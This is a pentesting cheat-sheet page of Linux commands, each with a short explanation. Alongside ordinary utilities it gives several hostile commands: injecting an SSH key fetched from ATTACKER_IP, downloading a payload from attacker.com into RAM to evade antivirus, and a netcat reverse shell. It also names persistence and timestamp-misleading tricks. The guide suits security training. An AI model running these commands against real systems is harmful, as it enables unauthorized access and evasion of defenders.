📜 Medium🛒 My Shop👾 Github📩 Telegram 📺 YouTube✖ Twitter

Practical Linux Commands

In penetration testing, Linux commands can be incredibly powerful when used efficiently. The following guide provides practical Linux commands for pentesters, explaining what each command does and how it can help during an engagement. These commands cover file manipulation, networking, process monitoring, and more.

File Manipulation Commands

  1. Base64 Encoding for Exfiltration

    base64 -w 0 file

    Encodes a file to Base64 without line breaks. Useful for encoding data in a way that can be sent via HTTP or other text-based protocols.

  2. Hex Dump Without New Lines

    xxd -p boot12.bin | tr -d '\n'

    Converts a binary file into a plain hex format. Removing new lines makes the output easier to manipulate, which is helpful for crafting payloads.

  3. Public Key Injection

    curl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys

    Adds an attacker's public key to the target machine’s authorized SSH keys. This gives the attacker remote access via SSH.

  4. Count Lines in a File

    wc -l <file>

    Counts the number of lines in a file, useful for verifying the amount of output or checking logs.

  5. Sort and Remove Duplicates

    sort file | uniq

    Sorts a file and removes duplicate lines. This is helpful when processing log files and identifying unique entries.

  6. Find Files Modified Within a Date Range

    find / -newermt 2023-08-01 ! -newermt 2023-08-05 -type f

    Finds files modified between specific dates, aiding in identifying files that may have been tampered with during an attack.

Networking and Communication Commands

  1. Set Up an HTTP Server (Quick File Serving)

    python3 -m http.server 80

    Creates an HTTP server to share files with the target machine. This is useful for serving payloads or retrieving data.

  2. Curl for Sending JSON Data

    curl --header "Content-Type: application/json" --request POST --data '{"username":"admin","password":"password"}' http://target/endpoint

    Sends JSON data to a web application, ideal for testing API endpoints or mimicking application behavior.

  3. SSH Key Scanning

    ssh-keyscan 10.10.10.101

    Retrieves the SSH key fingerprint from a remote machine. It helps in identifying duplicate SSH hosts, reducing security blind spots.

System Monitoring & Process Management

  1. List Open Files of Network Processes

    lsof -i

    Lists open files related to network processes. This is particularly useful to identify suspicious connections or find the process behind an open port.

  2. Process Monitoring with ps

    ps aux | grep apache

    Shows all processes and filters them by name (in this case, apache). This command helps you discover running services on the system.

  3. Finding Network Connections

    netstat -an | grep ESTABLISHED

    Displays established network connections. Essential for spotting backdoors or open connections to attacker-controlled servers.

Encryption and Key Management

  1. Generate RSA Key

    openssl genrsa -out attacker.key 2048

    Creates an RSA key, which can be used for encrypted communication, establishing secure connections, or signing data.

  2. Decrypt SSH Key

    openssl rsa -in key.ssh.enc -out key.ssh

    Decrypts an encrypted SSH private key. Useful when handling compromised SSH keys that are password protected.

  3. Create a Signed Certificate

    openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

    Creates a self-signed certificate, which can be used to mimic HTTPS servers for man-in-the-middle (MITM) attacks or phishing.

Privilege Escalation Tools

  1. Set Immutable Bit on a File

    sudo chattr +i /path/to/file

    Prevents modification or deletion of a file. Setting this flag can be a persistence technique to maintain unauthorized changes.

  2. Find SUID Binaries

    find / -perm -4000 2>/dev/null

    Finds all files with the SUID bit set. SUID binaries are a common target for privilege escalation attacks, making this a valuable command during enumeration.

Exploitation Utilities

  1. Download to RAM to Evade Detection

    wget http://attacker.com/payload.py -O /dev/shm/payload.py

    Downloads a file directly into the system’s RAM, making it less detectable by antivirus and other security software.

  2. Running a Reverse Shell with Netcat

    nc -e /bin/bash 10.10.10.10 4444

    Establishes a reverse shell from the target to the attacker's machine. This command is a cornerstone for remote code execution exploits.

Advanced Grep for Data Extraction

  1. Extract Emails

    grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt

    Extracts email addresses from files. Useful when searching for credentials or contacts during an attack.

  2. Extract Passwords

    grep -i "pwd\|pass\|password" file.txt

    Looks for potential password patterns in a file, an essential command for data discovery during internal network penetration tests.

  3. Extract IP Addresses

    grep -E -o "([0-9]{1,3}\.){3}[0-9]{1,3}" file.txt

    Finds all IP addresses inside a file, helpful for network mapping and identifying potential targets.

Miscellaneous Commands

  1. Change Timezone

    sudo dpkg-reconfigure tzdata

    Allows the attacker to change the system’s timezone. Useful for modifying timestamps during an attack to mislead incident responders.

  2. Mount Virtual Hard Drives

    guestmount --add NAME.vhd --inspector --ro /mnt/vhd

    Mounts a VHD file for investigation or exploitation. This can help access virtual machines' data without fully booting them.

PreviousBrute Force - Services, web, local, tools & wordlistsNextBypassing Bash Restrictions - Rbash

Last updated

Was this helpful?